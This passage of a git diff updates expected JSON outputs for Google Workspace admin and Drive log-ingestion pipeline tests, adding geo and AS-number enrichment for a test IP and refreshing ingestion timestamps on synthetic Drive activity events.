"continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5050,7 +5926,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005208800Z", + "ingested": "2021-12-14T14:44:54.652006823Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"0\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"}]}}", "provider": "admin", "action": "USERS_BULK_UPLOAD", @@ -5106,6 +5982,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5115,7 +6003,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005214200Z", + "ingested": "2021-12-14T14:44:54.652007183Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USERS_BULK_UPLOAD_NOTIFICATION_SENT", diff --git a/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json b/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json index 3640b63aa91..15e22811322 100644 --- a/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json +++ b/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -62,8 +50,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398293900Z", + "ingested": "2021-12-14T14:45:08.344986991Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"add_to_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "add_to_folder", @@ -79,21 +88,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -141,8 +141,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398298100Z", + "ingested": "2021-12-14T14:45:08.344989928Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_canceled\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_canceled", @@ -160,21 +181,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -222,8 +234,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398301600Z", + "ingested": "2021-12-14T14:45:08.344990414Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_comment_added\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_comment_added", @@ -241,21 +274,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -303,8 +327,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398307700Z", + "ingested": "2021-12-14T14:45:08.344990846Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_requested\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_requested", @@ -322,21 +367,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -384,8 +420,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398312700Z", + "ingested": "2021-12-14T14:45:08.344991275Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_reviewer_responded\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_reviewer_responded", @@ -403,21 +460,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -465,8 +513,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398317800Z", + "ingested": "2021-12-14T14:45:08.344991672Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"create\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "create", @@ -482,21 +551,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -544,8 +604,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398323600Z", + "ingested": "2021-12-14T14:45:08.344992068Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"delete\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "delete", @@ -561,21 +642,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -623,8 +695,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398329300Z", + "ingested": "2021-12-14T14:45:08.344997761Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"download\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "download", @@ -640,21 +733,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -702,8 +786,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398335Z", + "ingested": "2021-12-14T14:45:08.344998169Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"edit\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "edit", @@ -719,21 +824,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -781,8 +877,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398340800Z", + "ingested": "2021-12-14T14:45:08.344998561Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"add_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "add_lock", @@ -798,21 +915,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -864,8 +972,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398346600Z", + "ingested": "2021-12-14T14:45:08.344998962Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"move\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}", "provider": "drive", "action": "move", @@ -881,21 +1010,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -943,8 +1063,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398352600Z", + "ingested": "2021-12-14T14:45:08.344999546Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"preview\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "preview", @@ -960,21 +1101,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -1022,8 +1154,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398358400Z", + "ingested": "2021-12-14T14:45:08.344999932Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"print\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "print", @@ -1039,21 +1192,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -1103,8 +1247,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398364Z", + "ingested": "2021-12-14T14:45:08.345000330Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"remove_from_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}", "provider": "drive", "action": "remove_from_folder", @@ -1120,21 +1285,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -1184,8 +1340,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398369800Z", + "ingested": "2021-12-14T14:45:08.345000728Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"rename\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":true},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"bar.gif\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_value\",\"value\":\"foo.gif\",\"new_value\":\"bar.gif\"}]}}", "provider": "drive", "action": "rename", @@ -1201,21 +1378,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } 